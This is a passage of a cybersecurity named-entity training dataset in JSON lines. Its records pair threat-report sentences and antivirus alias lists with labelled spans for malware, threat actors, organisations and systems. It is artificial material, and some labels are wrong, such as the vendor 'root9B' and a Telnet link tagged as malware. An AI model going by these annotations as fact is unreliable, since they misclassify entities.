"cyner2_train"}} {"text": "A backdoor also known as: Backdoor.W32.Androm.toYX Trojan/Injector.drgl Win32.Trojan.WisdomEyes.16070401.9500.9978 Win.Trojan.WillExec-6356235-0 Backdoor.Androm.sdz Trojan.Zusy.D3FE2C Trojan:Win32/Lethic.Q!bit Backdoor.Androm Trj/GdSda.A W32/Injector.DQID!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004234", "source": "cyner2_train"}} {"text": "Samples uploaded to public repositories indicate that the new version of Typhon Reborn has been in the wild since December 2022.", "spans": {"MALWARE: Samples": [[0, 7]], "SYSTEM: public repositories": [[20, 
39]], "MALWARE: Typhon Reborn": [[73, 86]]}, "info": {"id": "cyner2_train_004235", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.RHUU-4415 MSIL.Trojan.Packed.G Trojan-Dropper.Win32.Scrop.ccm Trojan.Win32.Inject.dzszva Trojan.PWS.Multi.1690 BehavesLike.Win32.Trojan.tc TrojanDropper.Sysn.arw TR/Injector.drydq Trojan/MSIL.Inject Trojan:MSIL/Plimrost.B Trojan.Kazy.DAD984 Trojan-Dropper.Win32.Scrop.ccm Trojan/Win32.Injector.C952834 Trj/CI.A Trojan.MSIL.Injector MSIL/Kryptik.DDP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004236", "source": "cyner2_train"}} {"text": "Zcrypt uses the Nullsoft Scriptable Install System, which works like a Zip file, decompressing and loading the content while running.", "spans": {"MALWARE: Zcrypt": [[0, 6]], "SYSTEM: the Nullsoft Scriptable Install System,": [[12, 51]]}, "info": {"id": "cyner2_train_004237", "source": "cyner2_train"}} {"text": "The malware used in the new attacks was a variant of the infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: variant": [[42, 49]], "MALWARE: Shamoon worm": [[66, 78]], "ORGANIZATION: Saudi Aramco": [[93, 105]], "ORGANIZATION: Rasgas": [[110, 116]]}, "info": {"id": "cyner2_train_004238", "source": "cyner2_train"}} {"text": "This technical note discusses a relatively undocumented implant used by the APT10 group.", "spans": {"THREAT_ACTOR: APT10 group.": [[76, 88]]}, "info": {"id": "cyner2_train_004242", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_STARTPA.NSS W32/Backdoor2.HTGN Win32/Wysotot.GJVbdHD TROJ_STARTPA.NSS Win32.Trojan-Hijacker.Wysotot.A Trojan.Win32.AdLoad.eizvbn Adware.Mutabaha.255 Adware.MutabahaCRTD.Win32.1189 BehavesLike.Win32.ICLoader.gc Backdoor.Win32.ZAccess W32/Backdoor.SAIZ-5729 Trojan/Win32.StartPage Trojan.Adware.Zusy.D1584D PUP.Elex/Variant Downloader/Win32.Adware.R86759 
Trojan.StartPage PUP.Optional.Elex Trj/CI.A Trojan.StartPage!B6aZ1c5P97Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004243", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.Crypt.gauf Trojan.Starter.7472 Trojan.MSIL.ilny TR/AD.Binderon.roatv Trojan.Ursu.D13D6D Trojan.MSIL.Crypt.gauf PWS:AutoIt/Passup.A Win32/Spy.Autoit.BY Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004244", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.1BC9 Trojan.Banavkill Trojan-Banker.Win32.Banbra.wjem Trojan.Win32.Banbra.exnyzm TR/Spy.Banker.ohxzm Trojan.Ursu.D10A45 Trojan-Banker.Win32.Banbra.wjem Trojan:Win32/Banavkill.A Trojan/Win32.Banbra.C2352559 Trojan-Banker.Banbra Trj/GdSda.A Win32.Trojan.Falsesign.Htma Win32/Trojan.f8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004245", "source": "cyner2_train"}} {"text": "We are providing a detailed analysis of the rootkit, and also making the samples available to the industry to help others block this threat.", "spans": {"MALWARE: rootkit,": [[44, 52]], "ORGANIZATION: industry": [[98, 106]], "MALWARE: threat.": [[133, 140]]}, "info": {"id": "cyner2_train_004246", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLT180912HKGHAAI.Trojan Trojan.PWS.OnlineGames.ZON Trojan.PWS.OnlineGames.ZON Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass TSPY_ONLINEG.FGF Win.Trojan.Onlinegames-44 Trojan.PWS.OnlineGames.ZON Trojan.PWS.OnlineGames.ZON Trojan.Win32.OnLineGames.rzwt Troj.PSW32.W.OnLineGames.aoem!c Trojan.PWS.OnlineGames.ZON Packed.Win32.MUPACK.~KW Trojan.PWS.OnlineGames.ZON Trojan.PWS.Wsgame.5652 Trojan.OnLineGames.Win32.160328 TSPY_ONLINEG.FGF BehavesLike.Win32.Sdbot.cz Trojan/PSW.OnLineGames.akkc TrojanDropper:Win32/Tilcun.E Trojan/Win32.MalPack.C60090 Trojan.PWS.OnlineGames.ZON BScope.Trojan-PSW.Gomex.22 Trj/Pupack.A", "spans": {"MALWARE: backdoor": [[2, 
10]]}, "info": {"id": "cyner2_train_004248", "source": "cyner2_train"}} {"text": "The infamous Remote Access Trojan RAT Poison Ivy hereafter referred to as PIVY has resurfaced recently, and exhibits some new behaviors.", "spans": {"MALWARE: The infamous Remote Access Trojan RAT Poison Ivy": [[0, 48]], "MALWARE: PIVY": [[74, 78]]}, "info": {"id": "cyner2_train_004249", "source": "cyner2_train"}} {"text": "However, we recently encountered a botnet that uses a more unusual method: an FTP server that, in effect, acts as a C C server.", "spans": {"MALWARE: botnet": [[35, 41]], "SYSTEM: an FTP server": [[75, 88]]}, "info": {"id": "cyner2_train_004250", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Small.40960.BX TROJ_FAKEAV.ASI W32/Backdoor2.HASV Backdoor.Trojan.B Win32/Wonip.A TROJ_FAKEAV.ASI Trojan.PWS.Sniftp.15 W32/Backdoor.YSEB-6778 BDS/Wonip.A Backdoor:Win32/Wonip.A Trojan/Win32.Xema.C82592 W32/Backdr.FB!tr Win32/Backdoor.435", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004251", "source": "cyner2_train"}} {"text": "Since we published our article on Sage 2.0 last February, and the discovery of version 2.2 in March, the FortiGuard Labs team hasn't seen significant activity with this malware for over six months.", "spans": {"MALWARE: Sage 2.0": [[34, 42]], "MALWARE: version 2.2": [[79, 90]], "ORGANIZATION: the FortiGuard Labs team": [[101, 125]], "MALWARE: malware": [[169, 176]]}, "info": {"id": "cyner2_train_004252", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Qhosts Trojan.Win32.Z.Redcap.1251647 TR/RedCap.ymgda", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004253", "source": "cyner2_train"}} {"text": "We identified one specific spear phishing campaign launched against targets within Palestine, and specifically against Palestinian law enforcement agencies.", "spans": {"THREAT_ACTOR: spear phishing campaign": [[27, 50]], "ORGANIZATION: Palestinian law 
enforcement agencies.": [[119, 156]]}, "info": {"id": "cyner2_train_004255", "source": "cyner2_train"}} {"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. , cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data from only one misconfigured command and control server ( out of over 37 servers ) .", "spans": {"MALWARE: FrozenCell": [[27, 37]]}, "info": {"id": "cyner2_train_004257", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Yurist.Win32.37 Win32.Trojan.WisdomEyes.16070401.9500.9992 Backdoor.Win32.Yurist.cy Trojan.Win32.XFlash.bodumo Backdoor.W32.Yurist.cp!c Heur.Packed.Unknown BackDoor.XFlash BehavesLike.Win32.Backdoor.ph Backdoor/Yurist.z BDS/Yurist.K Backdoor:Win32/Yurist.K Trojan.Graftor.D45274 Backdoor.Win32.Yurist.cy Trojan/Win32.LdPinch.C27294 Win32.Backdoor.Yurist.Eads Backdoor.Yurist!9F5bediy4gg Backdoor.Win32.Yurist Trj/CI.A Win32/Backdoor.c62", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004258", "source": "cyner2_train"}} {"text": "If the victim opens it up, it will not only infect their system but send the same phishing document to other contacts via their Outlook inbox.", "spans": {"SYSTEM: system": [[57, 63]], "SYSTEM: Outlook inbox.": [[128, 142]]}, "info": {"id": "cyner2_train_004259", "source": "cyner2_train"}} {"text": "A backdoor also known as: BKDR_BAYROB.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9948 BKDR_BAYROB.SM4 TrojWare.Win32.Bayrob.A Trojan.Kelios.1 Trojan:Win32/Horkremoz.A W32/Bayrob.O!tr Win32/Trojan.4af", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004260", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.TDSS!O Backdoor.TDSS.Win32.7367 Trojan/Olmarik.akn Trojan.TDss.58 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_ALUREON_CD102969.RDXN Win.Trojan.Tdss-302 Backdoor.Win32.TDSS.dtx Trojan.Win32.TDSS.cdwoi Backdoor.Win32.A.Tdss.63488.B TrojWare.Win32.Olmarik.AME Trojan.DownLoader1.46896 TSPY_ALUREON_CD102969.RDXN BehavesLike.Win32.VBObfus.kh Backdoor.Win32.TDSS Backdoor/TDSS.apn Trojan[Backdoor]/Win32.TDSS Win32.Hack.TDSS.d.kcloud Backdoor.Win32.TDSS.dtx Trojan/Win32.Tdss.R1603 DNSChanger.ca Trojan.FakeAlert Win32/Olmarik.AKN Backdoor.TDSS!fzuavqQuzWg W32/DNSChanger.CA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004261", "source": "cyner2_train"}} {"text": "This, combined with its focus on a specific region, makes this threat interesting from the malware researchers' perspective.", "spans": {"MALWARE: threat": [[63, 69]], "ORGANIZATION: malware researchers'": [[91, 111]]}, "info": {"id": "cyner2_train_004263", "source": "cyner2_train"}} {"text": "Once they obtained access to the server, the attackers infected the system with two malicious payloads.", "spans": {"SYSTEM: server,": [[33, 40]], "THREAT_ACTOR: attackers": [[45, 54]], "SYSTEM: system": [[68, 74]], "MALWARE: malicious payloads.": [[84, 103]]}, "info": {"id": "cyner2_train_004264", "source": "cyner2_train"}} {"text": "A typical Lurk infection uses browser exploits to deliver non-persistent payloads to potential victims, probing their targets before deploying additional malware.", "spans": {"THREAT_ACTOR: Lurk": [[10, 14]], "VULNERABILITY: browser exploits": [[30, 46]], "MALWARE: non-persistent payloads": [[58, 81]], "ORGANIZATION: potential victims,": [[85, 103]], "MALWARE: deploying additional malware.": [[133, 162]]}, "info": {"id": "cyner2_train_004266", "source": "cyner2_train"}} {"text": "Some of the popular Android applications that Ewind targets include GTA Vice City, AVG cleaner, Minecraft – Pocket 
Edition, Avast! Ransomware Removal, VKontakte, and Opera Mobile.", "spans": {"SYSTEM: Android applications": [[20, 40]], "MALWARE: Ewind": [[46, 51]], "SYSTEM: GTA Vice City, AVG cleaner, Minecraft – Pocket Edition, Avast! Ransomware Removal, VKontakte,": [[68, 161]], "SYSTEM: Opera Mobile.": [[166, 179]]}, "info": {"id": "cyner2_train_004268", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Strictor.D1F9FA Trojan.Win32.BuhTrap.c Trojan.YakesCRTD.Win32.4839 Trojan/Win32.BuhTrap.c Backdoor:Win32/Buhtrap.A!dha Trojan.Win32.BuhTrap.c Trj/GdSda.A Backdoor.Win32.Buhtrap W32/Delf.QJL!tr Win32/Trojan.5c7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004271", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Etap.d Win32.Trojan.WisdomEyes.16070401.9500.9826 Trojan.GootKit!gm BehavesLike.Win32.Injector.fh Trojan.Barys.D1A48", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004275", "source": "cyner2_train"}} {"text": "That's why we refer to this malware as Shakti Trojan.", "spans": {"MALWARE: malware": [[28, 35]], "MALWARE: Shakti Trojan.": [[39, 53]]}, "info": {"id": "cyner2_train_004277", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Klone.bz W32/MUPX.A Packed.Win32.Klone.bz BackDoor.IRC.Rxbot.69 Backdoor.Win32.Rbot!IK Win32.Hack.Klone.bz.kcloud Packed/Win32.Klone Backdoor.IRCbot!312D Backdoor.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004278", "source": "cyner2_train"}} {"text": "Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the signature of the email, this is to make it look like the email was sent by a high-ranking Government official associated with Ministry of Home Affairs MHA.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]], "ORGANIZATION: Minister of Home affairs": [[73, 97]], "ORGANIZATION: Ministry of Home Affairs MHA.": [[231, 260]]}, "info": {"id": 
"cyner2_train_004279", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.GH Trojan.Crypt.GH Trojan.Crypt.GH Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass TROJ_PUKISH.A Trojan.Crypt.GH Win32.Trojan-dropper.Drob.Pdmj Trojan.Crypt.GH Trojan.Crypt.GH Trojan.MulDrop7.42417 TROJ_PUKISH.A Trojan-Dropper.Win32.Drob W32/Trojan.SPVB-8287 Win32.Infect.a.124448 TrojanDropper:Win32/Pukish.A Trojan.Crypt.GH Trj/CI.A Win32/Trojan.f42", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004280", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.W.CodeRed.l11t Exploit:Win32/CVE-2006-3942.A Exploit.Win32.CVE-2006-3942", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004281", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.W32.Havex!c Win32.Trojan.WisdomEyes.16070401.9500.9950 Trojan.Win32.Havex.tm Trojan.Proxy2.1026 BehavesLike.Win32.Dropper.gh Trojan.Havex.w TR/Havex.fbdyv Trojan.Win32.Havex.tm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004282", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.P2P.Puce.G Worm/W32.Kapucen.106496.EK I-Worm.Kapucen.b.n4 W32/Kapucen.b Trojan.Win32.Kapucen.qyzel Win32/Puce.D WORM_KAPUCEN.B Worm.Puce.E P2P-Worm.Win32.Kapucen.b Win32.Worm.P2P.Puce.G Worm.Kapucen.A Worm.Win32.P2P-Kapucen.106496.C Worm.Win32.Kapucen.B Win32.Worm.P2P.Puce.G Win32.HLLW.Puce Worm/Puce.D.90 WORM_KAPUCEN.B Worm/P2P.Kapcen.b Worm:Win32/Puce.D Win32.Worm.P2P.Puce.G Worm/Win32.Kapucen Trojan.Win32.Kapucen.B Win32/Kapucen.B P2P-Worm.Win32.Kapucen.b W32/Kapucen.fam!worm.p2p Win32/Puce.C W32/Puce.E.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004283", "source": "cyner2_train"}} {"text": "On July 17, 2017, we detected a malicious document in VirusTotal exploiting CVE-2017-0199.", "spans": {"ORGANIZATION: VirusTotal": [[54, 64]], "VULNERABILITY: exploiting": [[65, 75]]}, 
"info": {"id": "cyner2_train_004284", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packed.Win32.Klone!O Backdoor.SkSocket Backdoor.Trojan Trojan.Win32.SkSocket.uwlqa Backdoor.Win32.SkSocket.109_t0 BackDoor.Sksock Virus.Win32.SkSocket.C Backdoor/SkSocket.o BDS/SkSocket.109 Win-Trojan/SkSocket.40960 Trj/CI.A Win32/SkSocket.109 Win32.Backdoor.Sksocket.Dyqp Trojan/Win32.lssj.2cc.rgrk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004285", "source": "cyner2_train"}} {"text": "Initial indicators of compromise from todays WannaCry ransomware outbreak.", "spans": {"MALWARE: WannaCry ransomware": [[45, 64]]}, "info": {"id": "cyner2_train_004286", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9971 Win.Spyware.1756-2 BehavesLike.Win32.Autorun.dc Trojan/Win32.Xema.C73573", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004287", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod62e.Trojan.18e2 Win32.Trojan.WisdomEyes.16070401.9500.9922 Trojan.Kasperbogi W32/Trojan.PRNK-2932 TR/Golroted.jumln Trojan.Strictor.D16D8E Trojan:Win32/Parsky.A!bit Trj/GdSda.A Win32/Trojan.cfd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004289", "source": "cyner2_train"}} {"text": "A recent investigation by security firm CTI has identified a new wave of malware delivered to the MaaS and PPI service providers in the underground black markets, including a controversial piece of code linked to North-Korean hackers.", "spans": {"ORGANIZATION: security firm CTI": [[26, 43]], "MALWARE: malware": [[73, 80]], "ORGANIZATION: MaaS and PPI service providers": [[98, 128]], "THREAT_ACTOR: the underground black markets,": [[132, 162]], "THREAT_ACTOR: North-Korean hackers.": [[213, 234]]}, "info": {"id": "cyner2_train_004290", "source": "cyner2_train"}} {"text": "The payload, distributed disguised as antivirus, is a variant of Korplug RAT aka 
PlugX – a spyware with former associations with Chinese APT groups, and known from targeted attacks at important institutions of various countries.", "spans": {"MALWARE: payload,": [[4, 12]], "SYSTEM: antivirus,": [[38, 48]], "MALWARE: Korplug RAT": [[65, 76]], "MALWARE: PlugX": [[81, 86]], "MALWARE: spyware": [[91, 98]], "THREAT_ACTOR: Chinese APT groups,": [[129, 148]], "MALWARE: at": [[181, 183]], "ORGANIZATION: institutions": [[194, 206]]}, "info": {"id": "cyner2_train_004292", "source": "cyner2_train"}} {"text": "A backdoor also known as: PUP.Optional.FilePile.A PE:PUF.FilePile!1.9E19", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004293", "source": "cyner2_train"}} {"text": "The site was redirecting visitors to the malware through a compromised OpenX Ad server injecting a malicious iframe into the page.", "spans": {"ORGANIZATION: visitors": [[25, 33]], "MALWARE: malware": [[41, 48]]}, "info": {"id": "cyner2_train_004294", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.Ad.Pdms Trojan.InstallCube.412 Variant.Kazy.apq TR/AD.Fakruce.M.2 Trojan.Kazy.DBFFE0 Trojan.Win32.Z.Kazy.2435953 Trojan:Win32/Fakruce.B Trojan.Kazy!YZdrjH6xcT8 Trj/CI.A Win32/Trojan.824", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004295", "source": "cyner2_train"}} {"text": "Shamoon W32.Disttrack first made headlines in 2012 when it was used in attacks against energy companies in Saudi Arabia.", "spans": {"MALWARE: Shamoon": [[0, 7]], "ORGANIZATION: energy companies": [[87, 103]]}, "info": {"id": "cyner2_train_004297", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Rootkit.Koutodoor.a TrojWare.Win32.Zybr.A W32.Trojan.Koutodoor.E Trojan:Win32/Koutodoor.F Trojan.Zusy.D41F3C Trojan.Win32.koutodoor.i Trojan.Rootkit RootKit.Win32.Koutodoor.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004299", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Backdoor.NSIS Win32.Trojan.WisdomEyes.16070401.9500.9623 TR/AD.Trochilus.illau Backdoor:Win32/Trochil.A.dll!dha Win32/Korplug.KA Win32/Trojan.d66", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004300", "source": "cyner2_train"}} {"text": "From troubleshooting machines across countries to observing employees across rooms, RAT solutions have become widely used tools for remote maintenance and monitoring.", "spans": {"SYSTEM: machines": [[21, 29]], "ORGANIZATION: employees": [[60, 69]], "MALWARE: RAT": [[84, 87]]}, "info": {"id": "cyner2_train_004303", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.AntiAV.1355776.B Trojan.Win32.Vilsel!O Worm.Pykspa.C3 Worm.SkypeBot Trojan.Pykspa.1 Win32.Worm.Autorun.o W32.Pykspa.D Win32/Vilsel.CE WORM_VILSEL.SMC Win.Worm.Pykspa-1 Trojan-Ransom.Win32.Blocker.jcen Backdoor.W32.Zepfod.lohV Worm.Win32.Pykspa.a WORM_VILSEL.SMC BehavesLike.Win32.Pykse.tz Trojan/Blocker.lhz Trojan/Win32.AntiAV Trojan-Ransom.Win32.Blocker.jcen Trojan/Win32.Zepfod.R4378 Trojan.ChidikSun.28205 Trojan.Pykspa Trojan.Win32.Spy Trj/Vilsel.B Worm.Win32.Pykse.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004305", "source": "cyner2_train"}} {"text": "Mobile malware's disruptive impact on enterprises continues to see an uptick in prevalence as mobile devices become an increasingly preferred platform to flexibly access and manage data.", "spans": {"MALWARE: Mobile malware's": [[0, 16]], "SYSTEM: mobile devices": [[94, 108]]}, "info": {"id": "cyner2_train_004306", "source": "cyner2_train"}} {"text": "Morphick responded to a Kronos phishing campaign that involved a document with a malicious macro that downloaded the Kronos banking malware.", "spans": {"ORGANIZATION: Morphick": [[0, 8]], "THREAT_ACTOR: Kronos phishing campaign": [[24, 48]], "MALWARE: malicious macro": [[81, 96]], "MALWARE: Kronos banking malware.": [[117, 140]]}, "info": {"id": "cyner2_train_004307", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Trojan.Graftor.D13264 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.DownLoad3.euzkrf Trojan.Win32.Z.Graftor.605184.A Trojan.DownLoad3.23753 BehavesLike.Win32.Trojan.hh Trojan.Win32.CoinMiner Trojan/Win32.Unknown Trojan:Win32/Herxmin.A Trojan.CoinMiner!kUww8sDe3p0 W32/CoinMiner.CE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004310", "source": "cyner2_train"}} {"text": "The overall motivation of this campaign is unclear at this time.", "spans": {"THREAT_ACTOR: campaign": [[31, 39]]}, "info": {"id": "cyner2_train_004312", "source": "cyner2_train"}} {"text": "In fact, they have been using them since at least 2014 with very few variations in their modus operandi.", "spans": {}, "info": {"id": "cyner2_train_004313", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Info_InstallNA128.Trojan Trojan/W32.Buzus.61952.BP Trojan.Bulta Win32.Trojan.WisdomEyes.16070401.9500.9891 W32/MalwareS.FWD Win32/Tnega.AUFK Trojan.Win32.Drop.cuupf Trojan.Win32.Buzus.61952.D Trojan.Inject.63252 Trojan.Buzus.Win32.27194 BehavesLike.Win32.Backdoor.kh W32/Risk.CHGA-0655 Trojan/Buzus.svw Trojan/Win32.Buzus Backdoor:Win32/Gaertob.A Troj.W32.Buzus.tnoM Trojan/Win32.Buzus.R42500 BScope.Trojan.Palevo.012 Trojan.Buzus Trojan.Buzus!iqgr48px8nU Virus.Win32.Injector W32/Injector.fam!tr Win32/Trojan.203", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004314", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FadobesLTA.Trojan Trojan.Nixofro.A3 Trojan/Downloader.VB.qjf W32/Backdoor.VMXK-0114 Win32/TrojanDownloader.VB.QJF TROJ_SPNR.35CD14 Trojan.Win32.Foreign.ctjhyf Trojan.Win32.Z.Foreign.1078272.B[h] Troj.Ransom.W32.Foreign.kcme!c Trojan:W32/Kilim.P Trojan.Guncelle.2 Trojan.Foreign.Win32.41642 TROJ_SPNR.35CD14 BehavesLike.Win32.Trojan.tm W32/Backdoor2.HUDC TR/Kazy.323825.8 W32/Foreign.KCME!tr Trojan[Ransom]/Win32.Foreign Win32.Troj.Undef.kcloud 
Trojan.Symmi.D97A6 Trojan:Win32/Nixofro.A Hoax.Foreign Win32.Trojan.Foreign.Htmh Trojan.Win32.Nixofro", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004315", "source": "cyner2_train"}} {"text": "This was developed as an alternative to [Telnet]https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/, which sends information in plaintext, which is clearly a problem, especially when [passwords]https://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-1-principles-technologies-0156136/ are involved.", "spans": {"MALWARE: [Telnet]https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/,": [[40, 154]]}, "info": {"id": "cyner2_train_004318", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tiny.S22205 Win32.Trojan.WisdomEyes.16070401.9500.9981 TrojanDownloader.TinyLoader.c TR/Crypt.Xpack.xhbzp Trojan:Win32/Anobato.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004320", "source": "cyner2_train"}} {"text": "root9B discovered an advanced, targeted PoS intrusion focused on harvesting payment card information for exfiltration.", "spans": {"MALWARE: root9B": [[0, 6]]}, "info": {"id": "cyner2_train_004321", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.FD30 Backdoor.Win32.Delf!O Backdoor.Delf.Win32.7383 Win32.Worm.Delf.cq W32.Minudazash Win.Trojan.Delf-10643 Backdoor.Win32.Delf.oqi Trojan.Win32.Delf.culgk Backdoor.Win32.Delf.308224.E Win32.HLLW.Autoruner1.11184 BehavesLike.Win32.Fake.fc Virus.Win32.Virut Backdoor/Delf.ode Trojan[Backdoor]/Win32.Delf Worm:Win32/Scafros.A Backdoor.Win32.Delf.oqi Win32/FakeMS.WOCR Backdoor.Delf W32/Banker.LWD Backdoor.Delf!0+it/723aCk W32/Delf.OQI!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004322", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dukescamlock 
Trojan.TechSupportScam Ransom_DukescamLock.R002C0TK817 Win32.Trojan.WisdomEyes.16070401.9500.9553 W32.Golroted Ransom_DukescamLock.R002C0TK817 Trojan-FakeAV.MSIL.FakeSupport.d Trojan.KillProc.49845 Ransom.MSIL.DukescamLock TR/FakeSupport.gixtd Ransom:MSIL/DukescamLock.A Trojan-FakeAV.MSIL.FakeSupport.d Trj/GdSda.A MSIL/FakeSupport.AZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004324", "source": "cyner2_train"}} {"text": "ESET researchers have discovered a new sneaky malware threat named Joao, targeting gamers worldwide.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "MALWARE: new sneaky malware threat": [[35, 60]], "MALWARE: Joao,": [[67, 72]]}, "info": {"id": "cyner2_train_004326", "source": "cyner2_train"}} {"text": "CryptoWall is one ransomware variant that has shown gradual evolution over the past year with CryptoWall 2 and Cryptowall 3.", "spans": {"MALWARE: CryptoWall": [[0, 10]], "MALWARE: ransomware variant": [[18, 36]], "MALWARE: CryptoWall 2": [[94, 106]], "MALWARE: Cryptowall 3.": [[111, 124]]}, "info": {"id": "cyner2_train_004327", "source": "cyner2_train"}} {"text": "Yesterday January 19th we discovered a new wave of these attacks, where a number of electricity distribution companies in Ukraine were targeted again following the power outages in December.", "spans": {"ORGANIZATION: electricity distribution companies": [[84, 118]]}, "info": {"id": "cyner2_train_004328", "source": "cyner2_train"}} {"text": "Case in point: the emergence of UIWIX ransomware detected by Trend Micro as RANSOM_UIWIX.A and one notable Trojan our sensors detected.", "spans": {"MALWARE: UIWIX ransomware": [[32, 48]], "ORGANIZATION: Trend Micro": [[61, 72]], "MALWARE: Trojan": [[107, 113]]}, "info": {"id": "cyner2_train_004330", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan.Patched.JJ Trojan.Patched.JJ Trojan.Patched.JJ Win32.Trojan.WisdomEyes.16070401.9500.9925 Backdoor.Graybird 
Trojan.Patched.JJ Trojan.Patched.JJ Trojan.Patched.JJ BehavesLike.Win32.BadFile.gh W32.Trojan.Patched Trojan:Win32/Jaku.C!dha Trojan.Patched.JJ Trojan.Win32.Jaku", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004331", "source": "cyner2_train"}} {"text": "In at least one case, an app used for jailbreaking was available via this third-party app store.", "spans": {"VULNERABILITY: jailbreaking": [[38, 50]], "SYSTEM: third-party app store.": [[74, 96]]}, "info": {"id": "cyner2_train_004333", "source": "cyner2_train"}} {"text": "FBI and CISA believe this variant, which uses its own custom-made file encryption program, evolved from earlier iterations that used Zeon as a loader.", "spans": {"ORGANIZATION: FBI": [[0, 3]], "ORGANIZATION: CISA": [[8, 12]], "MALWARE: variant,": [[26, 34]], "MALWARE: Zeon": [[133, 137]], "MALWARE: loader.": [[143, 150]]}, "info": {"id": "cyner2_train_004334", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.AntiAV.105984 Trojan.Win32.AntiAV!O 